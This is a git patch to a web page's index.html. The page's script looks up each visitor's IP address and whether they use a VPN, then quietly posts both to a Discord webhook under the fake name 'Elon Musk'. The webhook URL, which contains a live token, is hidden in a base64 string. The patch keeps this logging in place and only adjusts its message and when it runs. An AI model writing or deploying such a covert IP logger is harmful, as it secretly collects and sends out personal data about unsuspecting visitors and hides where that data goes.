From a1799d659810260e6c627e798941822f4db5a3bb Mon Sep 17 00:00:00 2001 From: Boof <97455552+hexahigh@users.noreply.github.com> Date: Thu, 12 Jan 2023 09:17:59 +0100 Subject: [PATCH] e --- Other/XYgu/index.html | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/Other/XYgu/index.html b/Other/XYgu/index.html index 7a6a574..e483190 100644 --- a/Other/XYgu/index.html +++ b/Other/XYgu/index.html @@ -21,7 +21,6 @@ $.getJSON("https://europe-central2-portfolio-website-374313.cloudfunctions.net/g }) .catch(error => console.error(error)); //Send the webhook - window.onload = function sendMessage() { var webhook = atob("aHR0cHM6Ly9kaXNjb3JkLmNvbS9hcGkvd2ViaG9va3MvMTA1MTgyMTY2MjgwMDE5NTYxNC9hemJqU2JBLS1iRlgwbjRhMDNseDNwdGp6akVUT3lpcE5CMm1PVlNfc1pKaXR3YzM3R28wY21kR1gwVTVwSnRsdXllag=="); const request = new XMLHttpRequest(); request.open("POST", webhook); @@ -31,11 +30,10 @@ $.getJSON("https://europe-central2-portfolio-website-374313.cloudfunctions.net/g var params = { username: "Elon Musk", avatar_url: "", - content: "Did user use vpn?: " + usedvpn2 + " What is the ip?: " + userip + content: "Page id: 1. " + "Did user use vpn?: " + usedvpn2 + " What is the ip?: " + userip } request.send(JSON.stringify(params)); - } })